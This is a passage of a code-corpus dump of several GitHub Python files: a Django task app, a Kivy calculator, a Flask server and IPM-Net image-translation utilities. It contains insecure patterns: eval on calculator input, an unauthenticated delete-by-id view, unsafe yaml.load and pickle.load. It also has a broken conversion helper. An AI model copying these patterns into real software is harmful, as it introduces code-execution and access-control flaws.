"dataclasses.dataclass", "line_number": 91, "usage_type": "name"}, {"api_name": "kripke.Kripke.singleton", "line_number": 236, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 236, "usage_type": "name"}, {"api_name": "kripke.add_labels", "line_number": 239, "usage_type": "call"}, {"api_name": "kripke.Kripke.singleton", "line_number": 247, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 247, "usage_type": "name"}, {"api_name": "kripke.add_labels", "line_number": 250, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 272, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 272, "usage_type": "name"}, {"api_name": "ast.parse", "line_number": 290, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 290, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 291, "usage_type": "call"}, {"api_name": "ast.FunctionDef", "line_number": 291, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 214, "usage_type": "name"}, {"api_name": "ast.expr", "line_number": 295, "usage_type": "attribute"}, {"api_name": "ast.BoolOp", "line_number": 317, "usage_type": "attribute"}, {"api_name": "ast.And", "line_number": 322, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 347, "usage_type": "call"}, {"api_name": "ast.Or", "line_number": 350, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 381, "usage_type": "name"}, {"api_name": "ast.stmt", "line_number": 381, "usage_type": "attribute"}, {"api_name": "ast.If", "line_number": 395, "usage_type": "attribute"}, {"api_name": "kripke.Kripke", "line_number": 411, "usage_type": "name"}, {"api_name": "kripke.State", "line_number": 422, "usage_type": "name"}, {"api_name": "kripke.labels_for", "line_number": 423, "usage_type": "call"}, {"api_name": "kripke.states", "line_number": 425, "usage_type": "attribute"}, {"api_name": "kripke.State", "line_number": 411, "usage_type": "name"}]}
+{"seq_id": "23740878730", "text": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\nfrom django.views.generic import FormView\nfrom Home.forms import CustomUserCreationForm, TaskForm\nfrom django.contrib.auth import login\n\nfrom Home.models import Task\n# Create your views here.\n\nclass HomeView(TemplateView):\n template_name = \"home.html\"\n\nclass TasksView(FormView):\n template_name = \"tasks.html\"\n form_class = TaskForm\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n task = form.save(commit=False)\n task.user = request.user\n task.save()\n return redirect(\"Tasks\")\n return render(request, self.template_name)\n\nclass RegisterView(FormView):\n template_name = \"registration/register.html\"\n form_class = CustomUserCreationForm\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(\"Home\")\n\nclass MusicView(TemplateView):\n template_name = \"music.html\"\n\ndef delete(request, id):\n task = Task.objects.get(id=id)\n task.delete()\n return HttpResponseRedirect(reverse('Tasks'))", "repo_name": "Mathis-Armstrong/TaskFocus", "sub_path": "Home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.FormView", "line_number": 15, "usage_type": "name"}, {"api_name": "Home.forms.TaskForm", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.views.generic.FormView", "line_number": 28, "usage_type": "name"}, {"api_name": "Home.forms.CustomUserCreationForm", "line_number": 30, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 37, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 39, "usage_type": "name"}, {"api_name": "Home.models.Task.objects.get", "line_number": 43, "usage_type": "call"}, {"api_name": "Home.models.Task.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "Home.models.Task", "line_number": 43, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "4220175604", "text": "from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.utils import get_color_from_hex\n\n\nclass MainApp(App):\n\n def build(self):\n\n self.buttons = [[\"7\", \"8\", \"9\", \"/\"],\n [\"4\", \"5\", \"6\", \"*\"],\n [\"1\", \"2\", \"3\", \"-\"],\n [\".\", \"0\", \"C\", \"+\"],\n [\"=\"]\n ]\n self.operators = [\"/\", \"*\", \"-\", \"+\"]\n\n self.azul = '#56DEFF'\n\n self.solution = TextInput(readonly=True, text='')\n self.main_layout = BoxLayout(orientation=\"vertical\", spacing=10, padding=10)\n self.main_layout.add_widget(self.solution)\n self.equal_button = Button(text=\"=\", pos_hint={\"center_x\": .5, \"center_y\": .5})\n for row in self.buttons:\n r_layout = BoxLayout()\n for label in row:\n button = Button(text=label, pos_hint={\"center_x\": .5, \"center_y\": .5},\n background_color=get_color_from_hex(self.azul))\n\n button.bind(on_press=self.on_button_press)\n r_layout.add_widget(button)\n self.main_layout.add_widget(r_layout)\n\n return self.main_layout\n\n def on_button_press(self, instance):\n if instance.text != '=' and instance.text != 'C':\n self.solution.text += instance.text\n elif instance.text == 'C':\n self.solution.text = ''\n else:\n try:\n result = eval(self.solution.text)\n self.solution.text = str(result)\n print(result)\n except SyntaxError:\n print(\"Invalid syntax in expression\")\n\n\nif __name__ == '__main__':\n app = MainApp()\n app.run()\n", "repo_name": "alexandrecruzdev/Calculadora-Kivy-Python", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1809, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "kivy.app.App", "line_number": 8, "usage_type": "name"}, {"api_name": "kivy.uix.textinput.TextInput", "line_number": 22, "usage_type": "call"}, {"api_name": "kivy.uix.boxlayout.BoxLayout", "line_number": 23, "usage_type": "call"}, {"api_name": "kivy.uix.button.Button", "line_number": 25, "usage_type": "call"}, {"api_name": "kivy.uix.boxlayout.BoxLayout", "line_number": 27, "usage_type": "call"}, {"api_name": "kivy.uix.button.Button", "line_number": 29, "usage_type": "call"}, {"api_name": "kivy.utils.get_color_from_hex", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "26566118585", "text": "import sys\n\nPY3 = sys.version_info[0] == 3\n\ntry:\n from itertools import izip\n xrange = xrange\nexcept ImportError:\n # py3\n izip = zip\n xrange = range\n# end handle python version\n\ntry:\n # Python 2\n buffer = buffer\n memoryview = buffer\n # Assume no memory view ...\n def to_bytes(i):\n return i\nexcept NameError:\n # Python 3 has no `buffer`; only `memoryview`\n # However, it's faster to just slice the object directly, maybe it keeps a view internally\n def buffer(obj, offset, size=None):\n if size is None:\n # return memoryview(obj)[offset:]\n return obj[offset:]\n else:\n # return memoryview(obj)[offset:offset+size]\n return obj[offset:offset + size]\n # end buffer reimplementation\n # smmap can return memory view objects, which can't be compared as buffers/bytes can ... \n def to_bytes(i):\n if isinstance(i, memoryview):\n return i.tobytes()\n return i\n\n memoryview = memoryview\n\ntry:\n MAXSIZE = sys.maxint\nexcept AttributeError:\n MAXSIZE = sys.maxsize\n", "repo_name": "FelixZFB/Python_prevent_spider", "sub_path": "venv/Lib/site-packages/gitdb/utils/compat.py", "file_name": "compat.py", "file_ext": "py", "file_size_in_byte": 1093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 3, "usage_type": "attribute"}, {"api_name": "itertools.izip", "line_number": 10, "usage_type": "name"}, {"api_name": "sys.maxint", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.maxsize", "line_number": 43, "usage_type": "attribute"}]}
+{"seq_id": "74357896486", "text": "from flask import Flask\nimport threading\nimport time\n\napp = Flask(__name__)\n\n\nt_buff = 0\nf_buff = 0\nh_buff = 0\n\n\n\n@app.route('/get_num_1', methods=[\"GET\"])\ndef get_num_1():\n with open('number.txt', 'r') as f:\n lines = f.readline() \n print(lines)\n t_buff = lines.split()[0]\n f_buff = lines.split()[1]\n h_buff = lines.split()[2]\n\n num_dict = {\n 't': t_buff,\n 'f': f_buff,\n 'h': h_buff,\n }\n return num_dict\n\n\n\n\n@app.route('/get_table', methods=[\"GET\"])\ndef get_table():\n v = {\n 'id': \"100\",\n 'First_Name': \"Y\",\n 'Last_Name': \"D\",\n \"User_Name\": \"C\"\n }\n return v\n\n\nif __name__ == '__main__':\n # t1 = threading.Thread(target=read_from_txt, )\n # t1.start()\n app.run()\n", "repo_name": "dc-ying/dashboard_ui", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}]}
+{"seq_id": "73361110888", "text": "# -*- coding: utf-8 -*-\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torch.optim import lr_scheduler\nfrom torchvision import transforms\nfrom data import ImageFilelist, ImageFolder\nimport torch\nimport torch.nn as nn\nimport os\nimport math\nimport torchvision.utils as vutils\nimport yaml\nimport numpy as np\nimport torch.nn.init as init\nimport time\nimport torchfile\nimport random\nimport pickle\nimport resnet\n# Methods\n# get_all_data_loaders : primary data loader interface (load trainA, testA, trainB, testB)\n# get_data_loader_list : list-based data loader\n# get_data_loader_folder : folder-based data loader\n# get_config : load yaml file\n# eformat :\n# write_2images : save output image\n# prepare_sub_folder : create checkpoints and images folders for saving outputs\n# write_one_row_html : write one row of the html file for output images\n# write_html : create the html file.\n# write_loss\n# slerp\n# get_slerp_interp\n# get_model_list\n# load_vgg16\n# load_inception\n# vgg_preprocess\n# get_scheduler\n# weights_init\n\ndef get_all_data_loaders(conf):\n batch_size = conf['batch_size']\n num_workers = conf['num_workers']\n if 'new_size' in conf:\n new_size_a = new_size_b = conf['new_size']\n else:\n new_size_a = conf['new_size_a']\n new_size_b = conf['new_size_b']\n height = conf['crop_image_height']\n width = conf['crop_image_width']\n # data loader\n train_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA'), batch_size, True,\n new_size_a, height, width, num_workers, True, True)\n test_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA'), batch_size, False,\n new_size_a, height, width, num_workers, True, True)\n train_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainB'), batch_size, True,\n new_size_b, height, width, num_workers, True, True)\n test_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB'), batch_size, False,\n new_size_b, height, width, num_workers, True, True)\n train_mask_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA_face'), batch_size, False,\n new_size_a, height, width, num_workers, True, False)\n train_mask_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainB_face'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n test_mask_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA_face'), batch_size, False,\n new_size_a, height, width, num_workers, True, False)\n test_mask_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB_face'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n train_texture_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA_highcontract'), batch_size, False,\n new_size_a,height, width, num_workers, True, False)\n train_texture_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train','trainB_highcontract'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n test_texture_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA_highcontract'), batch_size, False,\n new_size_a,height, width, num_workers, True, False)\n test_texture_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB_highcontract'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n\n return train_loader_a, train_loader_b, test_loader_a, test_loader_b, train_mask_loader_a, train_mask_loader_b,\\\n test_mask_loader_a, test_mask_loader_b, train_texture_loader_a, train_texture_loader_b, \\\n test_texture_loader_a, test_texture_loader_b\n\ndef get_data_loader_folder(input_folder, batch_size, train, new_size=None,\n height=256, width=256, num_workers=4, crop=True, not_mask=True):\n transform_list = [transforms.ToTensor()]\n transform_list = transform_list + [transforms.Normalize((0.5, 0.5, 0.5),(0.5, 0.5, 0.5))] if not_mask else transform_list\n transform_list = [transforms.CenterCrop((height, width))] + transform_list if crop else transform_list\n transform_list = [transforms.Resize(new_size)] + transform_list if new_size is not None else transform_list\n # transform_list = [transforms.RandomHorizontalFlip()] + transform_list if train else transform_list\n transform = transforms.Compose(transform_list)\n dataset = ImageFolder(input_folder, transform=transform)\n loader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=False, drop_last=True, num_workers=num_workers)\n return loader\n\n\ndef get_config(config):\n with open(config, 'r') as stream:\n return yaml.load(stream)\n\n\ndef eformat(f, prec):\n s = \"%.*e\"%(prec, f)\n mantissa, exp = s.split('e')\n # add 1 to digits as 1 is taken by sign +/-\n return \"%se%d\"%(mantissa, int(exp))\n\n\ndef __write_images(image_outputs, display_image_num, file_name):\n image_outputs = [images.expand(-1, 3, -1, -1) for images in image_outputs] # expand gray-scale images to 3 channels\n image_tensor = torch.cat([images[:display_image_num] for images in image_outputs], 0)\n image_grid = vutils.make_grid(image_tensor.data, nrow=display_image_num, padding=0, normalize=True, scale_each=True)\n vutils.save_image(image_grid, file_name, nrow=1)\n\n\ndef write_2images(image_outputs, display_image_num, image_directory, postfix):\n n = len(image_outputs)\n __write_images(image_outputs[0:n//2], display_image_num, '%s/gen_a2b_%s.jpg' % (image_directory, postfix))\n __write_images(image_outputs[n//2:n], display_image_num, '%s/gen_b2a_%s.jpg' % (image_directory, postfix))\n\n\ndef prepare_sub_folder(output_directory):\n image_directory = os.path.join(output_directory, 'images')\n if not os.path.exists(image_directory):\n print(\"Creating directory: {}\".format(image_directory))\n os.makedirs(image_directory)\n checkpoint_directory = os.path.join(output_directory, 'checkpoints')\n if not os.path.exists(checkpoint_directory):\n print(\"Creating directory: {}\".format(checkpoint_directory))\n os.makedirs(checkpoint_directory)\n return checkpoint_directory, image_directory\n\n\ndef write_one_row_html(html_file, iterations, img_filename, all_size):\n html_file.write(\"iteration [%d] (%s) \" % (iterations,img_filename.split('/')[-1]))\n html_file.write(\"\"\"\n \n \n \n
\n \"\"\" % (img_filename, img_filename, all_size))\n return\n\n\ndef write_html(filename, iterations, image_save_iterations, image_directory, all_size=1536):\n html_file = open(filename, \"w\")\n html_file.write('''\n \n \n
\n Experiment name = %s \n \n \n \n ''' % os.path.basename(filename))\n html_file.write(\"current \")\n write_one_row_html(html_file, iterations, '%s/gen_a2b_train_current.jpg' % (image_directory), all_size)\n write_one_row_html(html_file, iterations, '%s/gen_b2a_train_current.jpg' % (image_directory), all_size)\n for j in range(iterations, image_save_iterations-1, -1):\n if j % image_save_iterations == 0:\n write_one_row_html(html_file, j, '%s/gen_a2b_test_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_b2a_test_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_a2b_train_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_b2a_train_%08d.jpg' % (image_directory, j), all_size)\n html_file.write(\"\")\n html_file.close()\n\n\ndef write_loss(iterations, trainer, train_writer):\n members = [attr for attr in dir(trainer) \\\n if not callable(getattr(trainer, attr)) and not attr.startswith(\"__\") and ('loss' in attr or 'grad' in attr or 'nwd' in attr)]\n for m in members:\n train_writer.add_scalar(m, getattr(trainer, m), iterations + 1)\n\n\ndef slerp(val, low, high):\n \"\"\"\n original: Animating Rotation with Quaternion Curves, Ken Shoemake\n https://arxiv.org/abs/1609.04468\n Code: https://github.com/soumith/dcgan.torch/issues/14, Tom White\n \"\"\"\n omega = np.arccos(np.dot(low / np.linalg.norm(low), high / np.linalg.norm(high)))\n so = np.sin(omega)\n return np.sin((1.0 - val) * omega) / so * low + np.sin(val * omega) / so * high\n\n\ndef get_slerp_interp(nb_latents, nb_interp, z_dim):\n \"\"\"\n modified from: PyTorch inference for \"Progressive Growing of GANs\" with CelebA snapshot\n https://github.com/ptrblck/prog_gans_pytorch_inference\n \"\"\"\n\n latent_interps = np.empty(shape=(0, z_dim), dtype=np.float32)\n for _ in range(nb_latents):\n low = np.random.randn(z_dim)\n high = np.random.randn(z_dim) # low + np.random.randn(512) * 0.7\n interp_vals = np.linspace(0, 1, num=nb_interp)\n latent_interp = np.array([slerp(v, low, high) for v in interp_vals],\n dtype=np.float32)\n latent_interps = np.vstack((latent_interps, latent_interp))\n\n return latent_interps[:, :, np.newaxis, np.newaxis]\n\n\n# Get model list for resume\ndef get_model_list(dirname, key):\n if os.path.exists(dirname) is False:\n return None\n gen_models = [os.path.join(dirname, f) for f in os.listdir(dirname) if\n os.path.isfile(os.path.join(dirname, f)) and key in f and \".pt\" in f]\n if gen_models is None:\n return None\n gen_models.sort()\n last_model_name = gen_models[-1]\n return last_model_name\n\n\ndef load_resnet50(model_dir):\n model = resnet.resnet50()\n load_state_dict(model, model_dir)\n return model\n\ndef load_inception(model_path):\n state_dict = torch.load(model_path)\n model = inception_v3(pretrained=False, transform_input=True)\n model.aux_logits = False\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, state_dict['fc.weight'].size(0))\n model.load_state_dict(state_dict)\n for param in model.parameters():\n param.requires_grad = False\n return model\n\ndef vgg_preprocess(batch):\n tensortype = type(batch.data)\n (r, g, b) = torch.chunk(batch, 3, dim = 1)\n batch = torch.cat((b, g, r), dim = 1) # convert RGB to BGR\n batch = (batch + 1) * 255 * 0.5 # [-1, 1] -> [0, 255]\n mean = tensortype(batch.data.size()).cuda()\n mean[:, 0, :, :] = 103.939\n mean[:, 1, :, :] = 116.779\n mean[:, 2, :, :] = 123.680\n batch = batch.sub(Variable(mean)) # subtract mean\n return batch\n\n\ndef get_scheduler(optimizer, hyperparameters, iterations=-1):\n if 'lr_policy' not in hyperparameters or hyperparameters['lr_policy'] == 'constant':\n scheduler = None # constant scheduler\n elif hyperparameters['lr_policy'] == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, step_size=hyperparameters['step_size'],\n gamma=hyperparameters['gamma'], last_epoch=iterations)\n else:\n return NotImplementedError('learning rate policy [%s] is not implemented', hyperparameters['lr_policy'])\n return scheduler\n\n\ndef weights_init(init_type='gaussian'):\n def init_fun(m):\n classname = m.__class__.__name__\n if (classname.find('Conv') == 0 or classname.find('Linear') == 0) and hasattr(m, 'weight'):\n # print m.__class__.__name__\n if init_type == 'gaussian':\n init.normal_(m.weight.data, 0.0, 0.02)\n elif init_type == 'xavier':\n init.xavier_normal_(m.weight.data, gain=math.sqrt(2))\n elif init_type == 'kaiming':\n init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\n elif init_type == 'orthogonal':\n init.orthogonal_(m.weight.data, gain=math.sqrt(2))\n elif init_type == 'default':\n pass\n else:\n assert 0, \"Unsupported initialization: {}\".format(init_type)\n if hasattr(m, 'bias') and m.bias is not None:\n init.constant_(m.bias.data, 0.0)\n\n return init_fun\n\n\nclass Timer:\n def __init__(self, msg):\n self.msg = msg\n self.start_time = None\n\n def __enter__(self):\n self.start_time = time.time()\n\n def __exit__(self, exc_type, exc_value, exc_tb):\n print(self.msg % (time.time() - self.start_time))\n\n\ndef pytorch03_to_pytorch04(state_dict_base, trainer_name):\n def __conversion_core(state_dict_base, trainer_name):\n state_dict = state_dict_base.copy()\n if trainer_name == 'IPMNet':\n for key, value in state_dict_base.items():\n if key.endswith(('enc_content.model.0.norm.running_mean',\n 'enc_content.model.0.norm.running_var',\n 'enc_content.model.1.norm.running_mean',\n 'enc_content.model.1.norm.running_var',\n 'enc_content.model.2.norm.running_mean',\n 'enc_content.model.2.norm.running_var',\n 'enc_content.model.3.model.0.model.1.norm.running_mean',\n 'enc_content.model.3.model.0.model.1.norm.running_var',\n 'enc_content.model.3.model.0.model.0.norm.running_mean',\n 'enc_content.model.3.model.0.model.0.norm.running_var',\n 'enc_content.model.3.model.1.model.1.norm.running_mean',\n 'enc_content.model.3.model.1.model.1.norm.running_var',\n 'enc_content.model.3.model.1.model.0.norm.running_mean',\n 'enc_content.model.3.model.1.model.0.norm.running_var',\n 'enc_content.model.3.model.2.model.1.norm.running_mean',\n 'enc_content.model.3.model.2.model.1.norm.running_var',\n 'enc_content.model.3.model.2.model.0.norm.running_mean',\n 'enc_content.model.3.model.2.model.0.norm.running_var',\n 'enc_content.model.3.model.3.model.1.norm.running_mean',\n 'enc_content.model.3.model.3.model.1.norm.running_var',\n 'enc_content.model.3.model.3.model.0.norm.running_mean',\n 'enc_content.model.3.model.3.model.0.norm.running_var',\n )):\n del state_dict[key]\n else:\n def __conversion_core(state_dict_base):\n state_dict = state_dict_base.copy()\n for key, value in state_dict_base.items():\n if key.endswith(('enc.model.0.norm.running_mean',\n 'enc.model.0.norm.running_var',\n 'enc.model.1.norm.running_mean',\n 'enc.model.1.norm.running_var',\n 'enc.model.2.norm.running_mean',\n 'enc.model.2.norm.running_var',\n 'enc.model.3.model.0.model.1.norm.running_mean',\n 'enc.model.3.model.0.model.1.norm.running_var',\n 'enc.model.3.model.0.model.0.norm.running_mean',\n 'enc.model.3.model.0.model.0.norm.running_var',\n 'enc.model.3.model.1.model.1.norm.running_mean',\n 'enc.model.3.model.1.model.1.norm.running_var',\n 'enc.model.3.model.1.model.0.norm.running_mean',\n 'enc.model.3.model.1.model.0.norm.running_var',\n 'enc.model.3.model.2.model.1.norm.running_mean',\n 'enc.model.3.model.2.model.1.norm.running_var',\n 'enc.model.3.model.2.model.0.norm.running_mean',\n 'enc.model.3.model.2.model.0.norm.running_var',\n 'enc.model.3.model.3.model.1.norm.running_mean',\n 'enc.model.3.model.3.model.1.norm.running_var',\n 'enc.model.3.model.3.model.0.norm.running_mean',\n 'enc.model.3.model.3.model.0.norm.running_var',\n\n 'dec.model.0.model.0.model.1.norm.running_mean',\n 'dec.model.0.model.0.model.1.norm.running_var',\n 'dec.model.0.model.0.model.0.norm.running_mean',\n 'dec.model.0.model.0.model.0.norm.running_var',\n 'dec.model.0.model.1.model.1.norm.running_mean',\n 'dec.model.0.model.1.model.1.norm.running_var',\n 'dec.model.0.model.1.model.0.norm.running_mean',\n 'dec.model.0.model.1.model.0.norm.running_var',\n 'dec.model.0.model.2.model.1.norm.running_mean',\n 'dec.model.0.model.2.model.1.norm.running_var',\n 'dec.model.0.model.2.model.0.norm.running_mean',\n 'dec.model.0.model.2.model.0.norm.running_var',\n 'dec.model.0.model.3.model.1.norm.running_mean',\n 'dec.model.0.model.3.model.1.norm.running_var',\n 'dec.model.0.model.3.model.0.norm.running_mean',\n 'dec.model.0.model.3.model.0.norm.running_var',\n )):\n del state_dict[key]\n return state_dict\n\n state_dict = dict()\n state_dict['a'] = __conversion_core(state_dict_base['a'], trainer_name)\n state_dict['b'] = __conversion_core(state_dict_base['b'], trainer_name)\n return state_dict\n\ndef randomflip(image, mask, texture):\n randnum = random.random()\n if randnum > 0.5:\n image = image.flip(3)\n mask, texture = mask.flip(3), texture.flip(3)\n return image, mask, texture\n\ndef randomcrop(image, mask, texture, height, width):\n random_h = random.randint(0, image.size()[2] - height)\n random_w = random.randint(0, image.size()[3] - width)\n image = image[:, :,random_h: random_h + height, random_w : random_w + width]\n mask = mask[:, :,random_h: random_h + height, random_w : random_w + width]\n texture = texture[:, :,random_h: random_h + height, random_w : random_w + width]\n return image, mask, texture\n\ndef load_state_dict(model, fname):\n \"\"\"\n Set parameters converted from Caffe models authors of VGGFace2 provide.\n See https://www.robots.ox.ac.uk/~vgg/data/vgg_face2/.\n Arguments:\n model: model\n fname: file name of parameters converted from a Caffe model, assuming the file format is Pickle.\n \"\"\"\n with open(fname, 'rb') as f:\n weights = pickle.load(f, encoding='latin1')\n\n own_state = model.state_dict()\n for name, param in weights.items():\n if name in own_state:\n try:\n own_state[name] = torch.from_numpy(param)\n # own_state[name].copy_(torch.from_numpy(param))\n except Exception:\n raise RuntimeError('While copying the parameter named {}, whose dimensions in the model are {} and whose '\\\n 'dimensions in the checkpoint are {}.'.format(name, own_state[name].size(), param.size()))\n else:\n raise KeyError('unexpected key \"{}\" in state_dict'.format(name))\n\n", "repo_name": "huangzhikun1995/IPM-Net", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 20670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 127, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 82, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 83, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 83, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 84, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 85, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 87, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 87, "usage_type": "name"}, {"api_name": "data.ImageFolder", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 89, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torchvision.utils.make_grid", "line_number": 108, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 108, "usage_type": "name"}, {"api_name": "torchvision.utils.save_image", "line_number": 109, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 109, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 191, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 192, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 196, "usage_type": "call"}, 